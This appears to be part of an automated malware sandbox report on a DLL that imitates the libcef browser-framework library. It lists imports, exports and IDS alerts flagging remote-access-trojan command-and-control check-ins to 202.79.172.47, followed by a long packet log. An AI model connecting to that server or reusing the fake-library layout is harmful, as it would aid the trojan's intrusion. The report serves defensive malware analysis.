KERNEL32.dll	MultiByteToWideChar, FlushFileBuffers, GetLastError, GetProcAddress, SetFileAttributesA, DefineDosDeviceA, LoadLibraryA, Process32FirstW, GetModuleFileNameA, Process32NextW, lstrcmpiW, CreateToolhelp32Snapshot, CloseHandle, SetFilePointer, SystemTimeToFileTime, SetFileTime, CreateDirectoryA, GetCurrentDirectoryA, LocalFileTimeToFileTime, ReadFile, UnmapViewOfFile, GetTickCount, OutputDebugStringA, HeapDestroy, HeapCreate, IsProcessorFeaturePresent, CreateFileW, WriteConsoleW, SetStdHandle, HeapReAlloc, GetFileAttributesA, Sleep, OpenProcess, WriteFile, GetCurrentProcess, InterlockedDecrement, GlobalAddAtomA, MoveFileExA, lstrlenA, GetFileSize, CreateFileA, GetStringTypeW, GetConsoleMode, GetConsoleCP, HeapSize, GetCurrentProcessId, SetLastError, TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, IsValidCodePage, GetOEMCP, GetACP, InterlockedIncrement, GetCPInfo, QueryPerformanceCounter, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetStartupInfoW, GetFileType, SetHandleCount, LCMapStringW, LoadLibraryW, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, LeaveCriticalSection, EnterCriticalSection, GetModuleFileNameW, WideCharToMultiByte, LocalFree, HeapFree, HeapAlloc, GetSystemTimeAsFileTime, GetModuleHandleW, ExitProcess, DecodePointer, GetCurrentThreadId, GetCommandLineA, RaiseException, RtlUnwind, EncodePointer, TerminateProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetStdHandle
USER32.dll	FindWindowA, wsprintfA, FindWindowExA, MessageBoxA, PostMessageA
ADVAPI32.dll	AdjustTokenPrivileges, GetLengthSid, RegOpenKeyExA, RegCreateKeyExA, LookupPrivilegeValueA, SetTokenInformation, RegSetValueExA, OpenProcessToken, RegCloseKey
SHELL32.dll	SHGetSpecialFolderPathA
ole32.dll	CoCreateInstance, CoInitializeSecurity, CoUninitialize, CoInitializeEx, CoInitialize, CoTaskMemAlloc
OLEAUT32.dll	SafeArrayGetUBound, SysFreeString, SafeArrayPutElement, SafeArrayUnaccessData, VariantInit, SafeArrayCreate, SafeArrayAccessData, VariantClear, SafeArrayGetLBound, SysAllocString
mscoree.dll	CLRCreateInstance
dbghelp.dll	MakeSureDirectoryPathExists
WINHTTP.dll	WinHttpReceiveResponse, WinHttpConnect, WinHttpCloseHandle, WinHttpQueryHeaders, WinHttpOpen, WinHttpReadData, WinHttpOpenRequest, WinHttpCrackUrl, WinHttpSendRequest, WinHttpAddRequestHeaders

Exports

Name	Ordinal	Address
cef_clear_cross_origin_whitelist	1	0x10004958
cef_clear_scheme_handler_factories	2	0x1000496f
cef_command_line_create	3	0x10004986
cef_command_line_get_global	4	0x1000499d
cef_cookie_manager_create_manager	5	0x100049b4
cef_cookie_manager_get_blocking_manager	6	0x100049cb
cef_cookie_manager_get_global_manager	7	0x100049e2
cef_crash_reporting_enabled	8	0x100049f9
cef_create_context_shared	9	0x10004a10
cef_create_directory	10	0x10004a27
cef_create_new_temp_directory	11	0x10004a3e
cef_create_temp_directory_in_directory	12	0x10004a55
cef_create_url	13	0x10004a6c
cef_currently_on	14	0x10004a83
cef_delete_file	15	0x10004a9a
cef_dictionary_value_create	16	0x10004ab1
cef_directory_exists	17	0x10004ac8
cef_display_get_alls	18	0x10004adf
cef_display_get_count	19	0x10004af6
cef_display_get_matching_bounds	20	0x10004b0d
cef_display_get_nearest_point	21	0x10004b24
cef_display_get_primary	22	0x10004b3b
cef_do_message_loop_work	23	0x10004b52
cef_drag_data_create	24	0x10004b69
cef_enable_highdpi_support	25	0x10004b80
cef_end_tracing	26	0x10004b83
cef_execute_java_script_with_user_gesture_for_tests	27	0x10004b9a
cef_execute_process	28	0x10004bb1
cef_force_web_plugin_shutdown	29	0x10004bc8
cef_format_url_for_security_display	30	0x10004bdf
cef_get_current_platform_thread_id	31	0x10004bf6
cef_get_extensions_for_mime_type	32	0x10004c0d
cef_get_geolocation	33	0x10004c24
cef_get_mime_type	34	0x10004c3b
cef_get_min_log_level	35	0x10004c52
cef_get_path	36	0x10004c69
cef_get_temp_directory	37	0x10004c80
cef_image_create	38	0x10004c97
cef_initialize	39	0x10004cae
cef_is_cert_status_error	40	0x10004cc5
cef_is_cert_status_minor_error	41	0x10004cdc
cef_is_web_plugin_unstable	42	0x10004cf3
cef_label_button_create	43	0x10004d0a
cef_launch_process	44	0x10004d21
cef_list_value_create	45	0x10004d38
cef_load_crlsets_file	46	0x10004d4f
cef_log	47	0x10004d66
cef_menu_button_create	48	0x10004d7d
cef_menu_model_create	49	0x10004d94
cef_now_from_system_trace_time	50	0x10004dab
cef_panel_create	51	0x10004dc2
cef_parse_csscolor	52	0x10004dd9
cef_parse_json	53	0x10004df0
cef_parse_jsonand_return_error	54	0x10004e07
cef_parse_url	55	0x10004e1e
cef_post_data_create	56	0x10004e35
cef_post_data_element_create	57	0x10004e4c
cef_post_delayed_task	58	0x10004e63
cef_post_task	59	0x10004e7a
cef_print_settings_create	60	0x10004e91
cef_process_message_create	61	0x10004ea8
cef_quit_message_loop	62	0x10004ebf
cef_refresh_web_plugins	63	0x10004ed6
cef_register_extension	64	0x10004eed
cef_register_scheme_handler_factory	65	0x10004f04
cef_register_web_plugin_crash	66	0x10004f1b
cef_register_widevine_cdm	67	0x10004f32
cef_remove_cross_origin_whitelist_entry	68	0x10004f49
cef_remove_web_plugin_path	69	0x10004f60
cef_request_context_create_context	70	0x10004f77
cef_request_context_get_global_context	71	0x10004f8e
cef_request_create	72	0x10004fa5
cef_response_create	73	0x10004fbc
cef_run_message_loop	74	0x10004fd3
cef_scroll_view_create	75	0x10004fea
cef_server_create	76	0x10005001
cef_set_crash_key_value	77	0x10005018
cef_set_osmodal_loop	78	0x1000502f
cef_shutdown	79	0x10005046
cef_stream_reader_create_for_data	80	0x1000505d
cef_stream_reader_create_for_file	81	0x10005074
cef_stream_reader_create_for_handler	82	0x1000508b
cef_stream_writer_create_for_file	83	0x100050a2
cef_stream_writer_create_for_handler	84	0x100050b9
cef_string_ascii_to_utf16	85	0x100050d0
cef_string_list_alloc	86	0x100050e7
cef_string_list_append	87	0x100050fe
cef_string_list_copy	88	0x10005115
cef_string_list_free	89	0x1000512c
cef_string_list_size	90	0x10005143
cef_string_list_value	91	0x1000515a
cef_string_map_alloc	92	0x10005171
cef_string_map_append	93	0x10005188
cef_string_map_free	94	0x1000519f
cef_string_map_key	95	0x100051b6
cef_string_map_size	96	0x100051cd
cef_string_map_value	97	0x100051e4
cef_string_multimap_alloc	98	0x100051fb
cef_string_multimap_append	99	0x10005212
cef_string_multimap_free	100	0x10005229
cef_string_multimap_key	101	0x10005240
cef_string_multimap_size	102	0x10005257
cef_string_multimap_value	103	0x1000526e
cef_string_userfree_utf16_free	104	0x10005285
cef_string_utf16_clear	105	0x10004b80
cef_string_utf16_cmp	106	0x1000529c
cef_string_utf16_set	107	0x100052b3
cef_string_utf16_to_lower	108	0x100052ca
cef_string_utf16_to_utf8	109	0x100052e1
cef_string_utf8_clear	110	0x100052f8
cef_string_utf8_to_utf16	111	0x10004b80
cef_string_wide_set	112	0x1000530f
cef_string_wide_to_utf8	113	0x10005326
cef_task_runner_get_for_current_thread	114	0x1000533d
cef_task_runner_get_for_thread	115	0x10005354
cef_textfield_create	116	0x1000536b
cef_time_delta	117	0x10005382
cef_time_now	118	0x10005399
cef_time_to_timet	119	0x100053b0
cef_unregister_internal_web_plugin	120	0x100053c7
cef_uridecode	121	0x100053de
cef_uriencode	122	0x100053f5
cef_urlrequest_create	123	0x1000540c
cef_v8context_get_current_context	124	0x10005423
cef_v8context_get_entered_context	125	0x1000543a
cef_v8context_in_context	126	0x10005451
cef_v8stack_trace_get_current	127	0x10005468
cef_v8value_create_array	128	0x1000547f
cef_v8value_create_array_buffer	129	0x10005496
cef_v8value_create_bool	130	0x100054ad
cef_v8value_create_date	131	0x100054c4
cef_v8value_create_double	132	0x100054db
cef_v8value_create_function	133	0x100054f2
cef_v8value_create_int	134	0x10005509
cef_v8value_create_null	135	0x10005520
cef_v8value_create_object	136	0x10005537
cef_v8value_create_string	137	0x1000554e
cef_v8value_create_uint	138	0x10005565
cef_v8value_create_undefined	139	0x1000557c
cef_value_create	140	0x10005593
cef_visit_web_plugin_info	141	0x100055aa
cef_window_create_top_level	142	0x100055c1
cef_write_json	143	0x100055d8
cef_zip_directory	144	0x100055ef
cef_zip_reader_create	145	0x10005606
create_context_shared	146	0x1000561d
you	147	0x10004953

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-27T06:22:45.214141+0100	2052875	ET MALWARE Anonymous RAT CnC Checkin	1	192.168.2.4	49741	202.79.172.47	7259	TCP
2024-12-27T06:23:58.057946+0100	2052875	ET MALWARE Anonymous RAT CnC Checkin	1	192.168.2.4	49744	202.79.172.47	7259	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 27, 2024 06:22:09.921171904 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:10.040903091 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:10.040999889 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:10.077848911 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:10.197406054 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:11.345278025 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:11.347697020 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:11.467350960 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:11.681175947 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:11.681236982 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:11.681274891 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:11.681314945 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:11.681372881 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:11.681384087 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:11.681402922 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:11.681421041 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:11.681454897 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:11.681477070 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:11.681489944 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:11.681710005 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:11.681761980 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:11.681765079 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:11.684730053 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:11.689654112 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:11.783349037 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:11.801114082 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:11.801151991 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:11.801234961 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:11.882575989 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:11.882632017 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:11.882699966 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:11.920444012 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:11.920500040 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:11.920573950 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.002124071 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.002161980 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.002240896 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.040080070 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.040138006 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.040174007 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.040208101 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.040209055 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.040242910 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.040277958 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.040312052 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.040347099 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.040400982 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.040400982 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.040419102 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.040453911 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.040488005 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.040520906 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.040543079 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.040555000 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.040564060 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.040590048 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.040623903 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.040656090 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.040680885 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.040716887 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.040750980 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.040766001 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.040787935 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.040843010 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.083928108 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.084012032 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.084016085 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.087687016 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.087827921 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.087836027 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.095359087 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.095433950 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.095504999 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.122014999 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.122114897 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.122190952 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.125816107 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.125946999 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.126048088 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.160526037 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.160559893 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.160682917 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.164129019 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.164252043 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.164314985 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.171791077 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.171897888 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.171960115 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.179436922 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.179514885 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.179574966 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.184216976 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.184353113 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.184385061 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.189038038 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.189165115 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.189225912 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.193876028 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.193978071 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.194044113 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.198662043 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.198725939 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.198796988 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.203485966 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.203625917 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.203680992 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.208266973 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.208395958 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.208477974 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.213090897 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.213207006 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.213285923 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.217935085 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.218044043 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.218132019 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.222738028 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.222871065 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.222937107 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.227572918 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.227654934 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.227675915 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.232346058 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.232498884 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.232577085 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.237149000 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.237271070 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.237343073 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.241947889 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.242074013 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.242146969 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.246762991 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.246895075 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.246962070 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.251648903 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.251702070 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.251732111 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.285339117 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.285382032 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.285419941 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.286640882 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.286710024 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.286794901 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.291505098 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.291558981 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.291620016 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.296329975 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.296401978 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.296448946 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.301088095 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.301155090 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.301927090 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.305970907 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.306066036 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.306071043 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.310751915 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.310820103 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.310877085 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.315551996 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.315608978 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.315675974 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.320302963 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.320382118 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.320436001 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.325206041 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.325259924 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.325331926 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.329926014 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.330054998 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.330148935 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.334755898 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.334827900 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.334862947 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.339606047 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.339660883 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.339683056 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.344374895 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.344434023 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.344495058 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.348953009 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.349014997 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.349086046 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.351860046 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.351896048 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.351912975 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.354677916 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.354747057 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.354780912 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.357584000 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.357633114 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.357713938 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.360390902 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.360455036 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.360526085 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.363149881 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.363248110 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.363282919 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.365813971 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.365870953 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.365956068 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.368527889 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.368588924 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.368654966 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.371119022 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.371226072 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.371233940 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.373812914 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.373893976 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.373965979 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.376370907 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.376425982 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.376475096 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.378937960 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.378992081 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.379064083 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.381268978 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.381335020 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.381390095 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.383606911 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.383691072 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.383728027 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.385922909 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.385987043 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.386023045 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.388262987 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.388356924 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.388416052 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.390573978 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.390629053 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.390677929 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.392884970 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.392940044 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.393011093 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.395225048 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.395308971 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.395390034 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.397541046 CET	80	49730	104.21.22.88	192.168.2.4
